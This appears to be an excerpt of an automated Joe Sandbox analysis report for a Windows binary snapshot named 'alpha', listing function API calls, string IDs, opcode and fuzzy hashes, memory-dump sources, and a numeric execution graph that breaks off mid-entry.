                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                        • String ID: Software\Classes
                                        • API String ID: 2714550308-1656466771
                                        • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                        • Instruction ID: da5f30158bfc21b08dd8a2fcf3cb2cea6d54a7b9483704953c07452441bdc777
                                        • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                        • Instruction Fuzzy Hash: 25416C32B0DB5291EA10EF16D885439A3A5FB84BE0B908131DF6E477A5FF39DA42C350
                                        Function 00007FF7CD48CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleTitle
                                        • String ID: -
                                        • API String ID: 3358957663-3695764949
                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                        • Instruction ID: c748e467075e0743f98b9e45d38919dffa59fb2bfa209dcdc71d09afd0d8500f
                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                        • Instruction Fuzzy Hash: E7316F21B0CA4286EA14BF12A804478EAA5BB89BF0F944135DF2E577D5FF3CE651C324
                                        Function 00007FF7CD497280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmpswscanf
                                        • String ID: :EOF
                                        • API String ID: 1534968528-551370653
                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                        • Instruction ID: e3983b0b46e150881e6b875a5e69506901cf1ef8294e1c2d5c2dc7b24bad2592
                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                        • Instruction Fuzzy Hash: 5B318E31B0CA4286EB64BF56B8406B8F6A6EF54B60FD44031DF6D46291FF2CEA41C760
                                        Function 00007FF7CD483BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmp
                                        • String ID: /-Y
                                        • API String ID: 1886669725-4274875248
                                        • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                        • Instruction ID: d29c0803212366d668018dbf19120bda719ed9ad94216b7284a1b26464bf4b8b
                                        • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                        • Instruction Fuzzy Hash: F3217166B0C75581EA10AF469848178F6A2BB54FE0F844035DFAC97794FF3CEA82D710
                                        Function 00007FF7CD48B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3$3
                                        • API String ID: 0-2538865259
                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                        • Instruction ID: d01a1294a90a065e0ce05ce44228ea3a66c0576e4ddf5f2f6594be908194d599
                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                        • Instruction Fuzzy Hash: 49012331F0E5828AF354AF629884278FA60BB903B1FD84135CE2E815E1FF2D6685C761
                                        Function 00007FF7CD4906C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                        • Instruction ID: 978296a0645cc9082028aae0f707cabe213949a83b6708db2184f0fb3dfc7a9d
                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                        • Instruction Fuzzy Hash: 8A416832B0D64286EA14AF12E444579FBA6EF85BA1BC88034DF6E03750EF3DE641C760

                                        Execution Graph

                                        Execution Coverage:5.7%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:618
                                        Total number of Limit Nodes:22
                                        execution_graph 16776 7ff7cd49416f 16777 7ff7cd49412e 16776->16777 16780 7ff7cd498f80 16777->16780 16781 7ff7cd498f89 16780->16781 16782 7ff7cd49413e 16781->16782 16783 7ff7cd498fe0 RtlCaptureContext RtlLookupFunctionEntry 16781->16783 16784 7ff7cd499025 RtlVirtualUnwind 16783->16784 16785 7ff7cd499067 16783->16785 16784->16785 16788 7ff7cd498fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16785->16788 16723 7ff7cd498d80 16724 7ff7cd498da4 16723->16724 16725 7ff7cd498db6 16724->16725 16726 7ff7cd498dbf Sleep 16724->16726 16727 7ff7cd498ddb _amsg_exit 16725->16727 16728 7ff7cd498de7 16725->16728 16726->16724 16727->16728 16729 7ff7cd498e56 _initterm 16728->16729 16730 7ff7cd498e73 _IsNonwritableInCurrentImage 16728->16730 16731 7ff7cd498e3c 16728->16731 16729->16730 16737 7ff7cd4937d8 GetCurrentThreadId OpenThread 16730->16737 16770 7ff7cd4904f4 16737->16770 16739 7ff7cd493839 HeapSetInformation RegOpenKeyExW 16740 7ff7cd49e9f8 RegQueryValueExW RegCloseKey 16739->16740 16741 7ff7cd49388d 16739->16741 16743 7ff7cd49ea41 GetThreadLocale 16740->16743 16742 7ff7cd495920 VirtualQuery VirtualQuery 16741->16742 16744 7ff7cd4938ab GetConsoleOutputCP GetCPInfo 16742->16744 16752 7ff7cd493919 16743->16752 16744->16743 16745 7ff7cd4938f1 memset 16744->16745 16745->16752 16746 7ff7cd494d5c 391 API calls 16746->16752 16747 7ff7cd49eb27 _setjmp 16747->16752 16748 7ff7cd493948 _setjmp 16748->16752 16749 7ff7cd483240 166 API calls 16749->16752 16750 7ff7cd4a8530 370 API calls 16750->16752 16751 7ff7cd4901b8 6 API calls 16751->16752 16752->16740 16752->16746 16752->16747 16752->16748 16752->16749 16752->16750 16752->16751 16753 7ff7cd494c1c 166 API calls 16752->16753 16754 7ff7cd48df60 481 API calls 16752->16754 16755 7ff7cd49eb71 _setmode 16752->16755 16756 7ff7cd4986f0 182 API calls 16752->16756 16757 7ff7cd490580 12 API calls 16752->16757 16759 7ff7cd4958e4 EnterCriticalSection LeaveCriticalSection 16752->16759 16761 7ff7cd48be00 647 API calls 16752->16761 16762 7ff7cd4958e4 EnterCriticalSection LeaveCriticalSection 16752->16762 16753->16752 16754->16752 16755->16752 16756->16752 16758 7ff7cd49398b GetConsoleOutputCP GetCPInfo 16757->16758 16760 7ff7cd4904f4 GetModuleHandleW GetProcAddress SetThreadLocale 16758->16760 16759->16752 16760->16752 16761->16752 16763 7ff7cd49ebbe GetConsoleOutputCP GetCPInfo 16762->16763 16764 7ff7cd4904f4 GetModuleHandleW GetProcAddress SetThreadLocale 16763->16764 16765 7ff7cd49ebe6 16764->16765 16766 7ff7cd48be00 647 API calls 16765->16766 16767 7ff7cd490580 12 API calls 16765->16767 16766->16765 16768 7ff7cd49ebfc GetConsoleOutputCP GetCPInfo 16767->16768 16769 7ff7cd4904f4 GetModuleHandleW GetProcAddress SetThreadLocale 16768->16769 16769->16752 16771 7ff7cd490504 16770->16771 16772 7ff7cd49051e GetModuleHandleW 16771->16772 16773 7ff7cd49054d GetProcAddress 16771->16773 16774 7ff7cd49056c SetThreadLocale 16771->16774 16772->16771 16773->16771 21927 7ff7cd48b3f0 21928 7ff7cd48b41a 21927->21928 21929 7ff7cd49c2a3 iswdigit 21928->21929 21932 7ff7cd48b42f 21928->21932 21929->21928 21930 7ff7cd49c2b7 21929->21930 21931 7ff7cd483278 166 API calls 21930->21931 21933 7ff7cd48b461 21931->21933 21935 7ff7cd48be00 21932->21935 21936 7ff7cd48be1b 21935->21936 21946 7ff7cd48bec8 21935->21946 21937 7ff7cd48be47 memset 21936->21937 21938 7ff7cd48be67 21936->21938 21936->21946 22041 7ff7cd48bff0 21937->22041 21940 7ff7cd48bf29 21938->21940 21941 7ff7cd48be73 21938->21941 21947 7ff7cd48beaf 21938->21947 21943 7ff7cd48cd90 166 API calls 21940->21943 21942 7ff7cd48be92 21941->21942 21944 7ff7cd48bf0c 21941->21944 21952 7ff7cd48bea1 21942->21952 21969 7ff7cd48c620 GetConsoleTitleW 21942->21969 21948 7ff7cd48bf33 21943->21948 22079 7ff7cd48b0d8 memset 21944->22079 21946->21933 21947->21946 21950 7ff7cd48bff0 185 API calls 21947->21950 21948->21947 21953 7ff7cd48bf70 21948->21953 21956 7ff7cd4888a8 _wcsicmp 21948->21956 21950->21946 21952->21947 21958 7ff7cd48af98 2 API calls 21952->21958 21963 7ff7cd48bf75 21953->21963 22139 7ff7cd4871ec 21953->22139 21954 7ff7cd48bf1e 21954->21947 21957 7ff7cd48bf5a 21956->21957 21957->21953 21960 7ff7cd490a6c 273 API calls 21957->21960 21958->21947 21959 7ff7cd48bfa9 21959->21947 21961 7ff7cd48cd90 166 API calls 21959->21961 21960->21953 21962 7ff7cd48bfbb 21961->21962 21962->21947 21964 7ff7cd49081c 166 API calls 21962->21964 21965 7ff7cd48b0d8 194 API calls 21963->21965 21964->21963 21966 7ff7cd48bf7f 21965->21966 21966->21947 22012 7ff7cd495ad8 21966->22012 21971 7ff7cd48c675 21969->21971 21976 7ff7cd48ca2f 21969->21976 21970 7ff7cd49c5fc GetLastError 21970->21976 21972 7ff7cd48ca40 17 API calls 21971->21972 21982 7ff7cd48c69b 21972->21982 21973 7ff7cd483278 166 API calls 21973->21976 21974 7ff7cd49855c ??_V@YAXPEAX 21974->21976 21975 7ff7cd49291c 8 API calls 22001 7ff7cd48c762 21975->22001 21976->21970 21976->21973 21976->21974 21977 7ff7cd48c9b5 21980 7ff7cd49855c ??_V@YAXPEAX 21977->21980 21978 7ff7cd4889c0 23 API calls 21978->22001 21979 7ff7cd49855c ??_V@YAXPEAX 21979->22001 22002 7ff7cd48c855 21980->22002 21981 7ff7cd48c978 towupper 21981->22001 21982->21976 21982->21977 21984 7ff7cd48d3f0 223 API calls 21982->21984 21982->22001 21983 7ff7cd49c60e 21987 7ff7cd4aec14 173 API calls 21983->21987 21985 7ff7cd48c741 21984->21985 21988 7ff7cd48c74d 21985->21988 21992 7ff7cd48c8b5 wcsncmp 21985->21992 21986 7ff7cd48c872 21989 7ff7cd49855c ??_V@YAXPEAX 21986->21989 21987->22001 21993 7ff7cd48bd38 207 API calls 21988->21993 21988->22001 21991 7ff7cd48c87c 21989->21991 21990 7ff7cd49c6b8 SetConsoleTitleW 21990->21986 21994 7ff7cd498f80 7 API calls 21991->21994 21992->21988 21992->22001 21993->22001 21996 7ff7cd48c88e 21994->21996 21995 7ff7cd48c83d 22145 7ff7cd48cb40 21995->22145 21996->21952 21998 7ff7cd48c78a wcschr 21998->22001 22000 7ff7cd48ca25 22004 7ff7cd483278 166 API calls 22000->22004 22001->21970 22001->21975 22001->21976 22001->21977 22001->21978 22001->21979 22001->21981 22001->21983 22001->21995 22001->21998 22001->22000 22001->22001 22005 7ff7cd49c684 22001->22005 22007 7ff7cd48ca2a 22001->22007 22009 7ff7cd48ca16 GetLastError 22001->22009 22002->21986 22002->21990 22004->21976 22006 7ff7cd483278 166 API calls 22005->22006 22006->21976 22008 7ff7cd499158 7 API calls 22007->22008 22008->21976 22011 7ff7cd483278 166 API calls 22009->22011 22011->21976 22013 7ff7cd48cd90 166 API calls 22012->22013 22014 7ff7cd495b12 22013->22014 22015 7ff7cd495b8b 22014->22015 22016 7ff7cd48cb40 166 API calls 22014->22016 22017 7ff7cd498f80 7 API calls 22015->22017 22018 7ff7cd495b26 22016->22018 22019 7ff7cd48bf99 22017->22019 22018->22015 22020 7ff7cd490a6c 273 API calls 22018->22020 22019->21952 22021 7ff7cd495b43 22020->22021 22022 7ff7cd495bb8 22021->22022 22023 7ff7cd495b48 GetConsoleTitleW 22021->22023 22024 7ff7cd495bf4 22022->22024 22025 7ff7cd495bbd GetConsoleTitleW 22022->22025 22026 7ff7cd48cad4 172 API calls 22023->22026 22027 7ff7cd49f452 22024->22027 22028 7ff7cd495bfd 22024->22028 22030 7ff7cd48cad4 172 API calls 22025->22030 22029 7ff7cd495b66 22026->22029 22032 7ff7cd493c24 166 API calls 22027->22032 22028->22015 22034 7ff7cd49f462 22028->22034 22035 7ff7cd495c1b 22028->22035 22161 7ff7cd494224 InitializeProcThreadAttributeList 22029->22161 22033 7ff7cd495bdb 22030->22033 22032->22015 22221 7ff7cd4896e8 22033->22221 22039 7ff7cd483278 166 API calls 22034->22039 22038 7ff7cd483278 166 API calls 22035->22038 22036 7ff7cd495b7f 22040 7ff7cd495c3c SetConsoleTitleW 22036->22040 22038->22015 22039->22015 22040->22015 22042 7ff7cd48c01c 22041->22042 22045 7ff7cd48c0c4 22041->22045 22043 7ff7cd48c022 22042->22043 22044 7ff7cd48c086 22042->22044 22046 7ff7cd48c030 22043->22046 22047 7ff7cd48c113 22043->22047 22049 7ff7cd48c144 22044->22049 22060 7ff7cd48c094 22044->22060 22045->21938 22048 7ff7cd48c039 wcschr 22046->22048 22062 7ff7cd48c053 22046->22062 22058 7ff7cd48ff70 2 API calls 22047->22058 22047->22062 22051 7ff7cd48c301 22048->22051 22048->22062 22050 7ff7cd48c151 22049->22050 22068 7ff7cd48c1c8 22049->22068 22427 7ff7cd48c460 22050->22427 22057 7ff7cd48cd90 166 API calls 22051->22057 22052 7ff7cd48c0c6 22056 7ff7cd48c0cf wcschr 22052->22056 22066 7ff7cd48c073 22052->22066 22053 7ff7cd48c058 22063 7ff7cd48ff70 2 API calls 22053->22063 22053->22066 22055 7ff7cd48c460 183 API calls 22055->22060 22061 7ff7cd48c1be 22056->22061 22056->22066 22078 7ff7cd48c30b 22057->22078 22058->22062 22060->22045 22060->22055 22064 7ff7cd48cd90 166 API calls 22061->22064 22062->22052 22062->22053 22070 7ff7cd48c211 22062->22070 22063->22066 22064->22068 22065 7ff7cd48c460 183 API calls 22065->22045 22066->22045 22067 7ff7cd48c460 183 API calls 22066->22067 22067->22066 22068->22045 22069 7ff7cd48c285 22068->22069 22068->22070 22075 7ff7cd48d840 178 API calls 22068->22075 22069->22070 22074 7ff7cd48b6b0 170 API calls 22069->22074 22073 7ff7cd48ff70 2 API calls 22070->22073 22071 7ff7cd48b6b0 170 API calls 22071->22062 22072 7ff7cd48d840 178 API calls 22072->22078 22073->22045 22076 7ff7cd48c2ac 22074->22076 22075->22068 22076->22066 22076->22070 22077 7ff7cd48c3d4 22077->22066 22077->22070 22077->22071 22078->22045 22078->22070 22078->22072 22078->22077 22080 7ff7cd48ca40 17 API calls 22079->22080 22088 7ff7cd48b162 22080->22088 22081 7ff7cd48b303 22084 7ff7cd498f80 7 API calls 22081->22084 22082 7ff7cd48b2f7 ??_V@YAXPEAX 22082->22081 22083 7ff7cd48b1d9 22087 7ff7cd48cd90 166 API calls 22083->22087 22110 7ff7cd48b1ed 22083->22110 22086 7ff7cd48b315 22084->22086 22085 7ff7cd491ea0 8 API calls 22085->22088 22086->21942 22086->21954 22087->22110 22088->22083 22088->22085 22109 7ff7cd48b2e1 22088->22109 22090 7ff7cd48b228 _get_osfhandle 22094 7ff7cd48b23f _get_osfhandle 22090->22094 22090->22110 22091 7ff7cd49bfef _get_osfhandle SetFilePointer 22092 7ff7cd49c01d 22091->22092 22091->22110 22095 7ff7cd4933f0 _vsnwprintf 22092->22095 22094->22110 22096 7ff7cd49c038 22095->22096 22102 7ff7cd483278 166 API calls 22096->22102 22097 7ff7cd49c1c3 22101 7ff7cd4933f0 _vsnwprintf 22097->22101 22098 7ff7cd4901b8 6 API calls 22098->22110 22099 7ff7cd48d208 _close 22099->22110 22100 7ff7cd4926e0 19 API calls 22100->22110 22101->22096 22103 7ff7cd49c1f9 22102->22103 22105 7ff7cd48af98 2 API calls 22103->22105 22104 7ff7cd49c060 22107 7ff7cd49c246 22104->22107 22112 7ff7cd4909f4 2 API calls 22104->22112 22105->22109 22106 7ff7cd48b038 _dup2 22106->22110 22113 7ff7cd48af98 2 API calls 22107->22113 22108 7ff7cd49c1a5 22111 7ff7cd48b038 _dup2 22108->22111 22109->22081 22109->22082 22110->22090 22110->22091 22110->22097 22110->22098 22110->22099 22110->22100 22110->22104 22110->22106 22110->22107 22110->22108 22110->22109 22115 7ff7cd48b356 22110->22115 22441 7ff7cd48affc _dup 22110->22441 22443 7ff7cd4af318 _get_osfhandle GetFileType 22110->22443 22116 7ff7cd49c1b7 22111->22116 22117 7ff7cd49c084 22112->22117 22114 7ff7cd49c24b 22113->22114 22118 7ff7cd4af1d8 166 API calls 22114->22118 22123 7ff7cd48af98 2 API calls 22115->22123 22119 7ff7cd49c207 22116->22119 22120 7ff7cd49c1be 22116->22120 22121 7ff7cd48b900 166 API calls 22117->22121 22118->22109 22122 7ff7cd48d208 _close 22119->22122 22124 7ff7cd48d208 _close 22120->22124 22125 7ff7cd49c08c 22121->22125 22122->22115 22126 7ff7cd49c211 22123->22126 22124->22097 22127 7ff7cd49c094 wcsrchr 22125->22127 22138 7ff7cd49c0ad 22125->22138 22128 7ff7cd4933f0 _vsnwprintf 22126->22128 22127->22138 22129 7ff7cd49c22c 22128->22129 22130 7ff7cd483278 166 API calls 22129->22130 22130->22109 22131 7ff7cd49c106 22133 7ff7cd48ff70 2 API calls 22131->22133 22132 7ff7cd49c0e0 _wcsnicmp 22132->22138 22134 7ff7cd49c13b 22133->22134 22134->22107 22135 7ff7cd49c146 SearchPathW 22134->22135 22135->22107 22136 7ff7cd49c188 22135->22136 22137 7ff7cd4926e0 19 API calls 22136->22137 22137->22108 22138->22131 22138->22132 22140 7ff7cd487279 22139->22140 22141 7ff7cd487211 _setjmp 22139->22141 22140->21959 22141->22140 22143 7ff7cd487265 22141->22143 22444 7ff7cd4872b0 22143->22444 22146 7ff7cd48cb63 22145->22146 22147 7ff7cd48cd90 166 API calls 22146->22147 22148 7ff7cd48c848 22147->22148 22148->22002 22149 7ff7cd48cad4 22148->22149 22150 7ff7cd48cb05 22149->22150 22151 7ff7cd48cad9 22149->22151 22150->22002 22151->22150 22152 7ff7cd48cd90 166 API calls 22151->22152 22153 7ff7cd49c722 22152->22153 22153->22150 22154 7ff7cd49c72e GetConsoleTitleW 22153->22154 22154->22150 22155 7ff7cd49c74a 22154->22155 22156 7ff7cd48b6b0 170 API calls 22155->22156 22159 7ff7cd49c778 22156->22159 22157 7ff7cd49c7ec 22158 7ff7cd48ff70 2 API calls 22157->22158 22158->22150 22159->22157 22160 7ff7cd49c7dd SetConsoleTitleW 22159->22160 22160->22157 22162 7ff7cd49ecd4 GetLastError 22161->22162 22163 7ff7cd4942ab UpdateProcThreadAttribute 22161->22163 22168 7ff7cd49ecee 22162->22168 22164 7ff7cd49ecf0 GetLastError 22163->22164 22165 7ff7cd4942eb memset memset GetStartupInfoW 22163->22165 22258 7ff7cd4a9eec 22164->22258 22167 7ff7cd493a90 170 API calls 22165->22167 22170 7ff7cd4943a8 22167->22170 22171 7ff7cd48b900 166 API calls 22170->22171 22172 7ff7cd4943bb 22171->22172 22173 7ff7cd494638 _local_unwind 22172->22173 22174 7ff7cd4943cc 22172->22174 22173->22174 22175 7ff7cd494415 22174->22175 22176 7ff7cd4943de wcsrchr 22174->22176 22245 7ff7cd495a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22175->22245 22176->22175 22177 7ff7cd4943f7 lstrcmpW 22176->22177 22177->22175 22179 7ff7cd494668 22177->22179 22246 7ff7cd4a9044 22179->22246 22180 7ff7cd49441a 22182 7ff7cd49442a CreateProcessW 22180->22182 22184 7ff7cd494596 CreateProcessAsUserW 22180->22184 22183 7ff7cd49448b 22182->22183 22185 7ff7cd494672 GetLastError 22183->22185 22186 7ff7cd494495 CloseHandle 22183->22186 22184->22183 22199 7ff7cd49468d 22185->22199 22187 7ff7cd49498c 8 API calls 22186->22187 22188 7ff7cd4944c5 22187->22188 22191 7ff7cd4944cd 22188->22191 22188->22199 22189 7ff7cd4947a3 22189->22036 22190 7ff7cd4944f8 22190->22189 22192 7ff7cd494612 22190->22192 22194 7ff7cd495cb4 7 API calls 22190->22194 22191->22189 22191->22190 22210 7ff7cd4aa250 33 API calls 22191->22210 22195 7ff7cd49461c 22192->22195 22197 7ff7cd4947e1 CloseHandle 22192->22197 22193 7ff7cd48cd90 166 API calls 22196 7ff7cd494724 22193->22196 22198 7ff7cd494517 22194->22198 22201 7ff7cd48ff70 GetProcessHeap RtlFreeHeap 22195->22201 22200 7ff7cd49472c _local_unwind 22196->22200 22207 7ff7cd49473d 22196->22207 22197->22195 22202 7ff7cd4933f0 _vsnwprintf 22198->22202 22199->22191 22199->22193 22200->22207 22203 7ff7cd4947fa DeleteProcThreadAttributeList 22201->22203 22204 7ff7cd494544 22202->22204 22205 7ff7cd498f80 7 API calls 22203->22205 22206 7ff7cd49498c 8 API calls 22204->22206 22208 7ff7cd494820 22205->22208 22209 7ff7cd494558 22206->22209 22211 7ff7cd48ff70 GetProcessHeap RtlFreeHeap 22207->22211 22208->22036 22212 7ff7cd494564 22209->22212 22213 7ff7cd4947ae 22209->22213 22210->22190 22214 7ff7cd49475b _local_unwind 22211->22214 22215 7ff7cd49498c 8 API calls 22212->22215 22216 7ff7cd4933f0 _vsnwprintf 22213->22216 22214->22191 22217 7ff7cd494577 22215->22217 22216->22192 22217->22195 22218 7ff7cd49457f 22217->22218 22219 7ff7cd4aa920 210 API calls 22218->22219 22220 7ff7cd494584 22219->22220 22220->22195 22242 7ff7cd489737 22221->22242 22223 7ff7cd48cd90 166 API calls 22223->22242 22224 7ff7cd48977d memset 22225 7ff7cd48ca40 17 API calls 22224->22225 22225->22242 22226 7ff7cd49b76e 22228 7ff7cd483278 166 API calls 22226->22228 22227 7ff7cd49b7b3 22230 7ff7cd49b787 22228->22230 22229 7ff7cd49b79a 22232 7ff7cd49855c ??_V@YAXPEAX 22229->22232 22233 7ff7cd49b795 22230->22233 22234 7ff7cd4ae944 393 API calls 22230->22234 22231 7ff7cd48b364 17 API calls 22231->22242 22232->22227 22343 7ff7cd4a7694 22233->22343 22234->22233 22238 7ff7cd4896b4 186 API calls 22238->22242 22239 7ff7cd48986d 22240 7ff7cd489880 ??_V@YAXPEAX 22239->22240 22241 7ff7cd48988c 22239->22241 22240->22241 22243 7ff7cd498f80 7 API calls 22241->22243 22242->22223 22242->22224 22242->22226 22242->22227 22242->22229 22242->22231 22242->22238 22242->22239 22260 7ff7cd491fac memset 22242->22260 22287 7ff7cd48ce10 22242->22287 22337 7ff7cd495920 22242->22337 22244 7ff7cd48989d 22243->22244 22244->22036 22247 7ff7cd493a90 170 API calls 22246->22247 22248 7ff7cd4a9064 22247->22248 22249 7ff7cd4a9083 22248->22249 22250 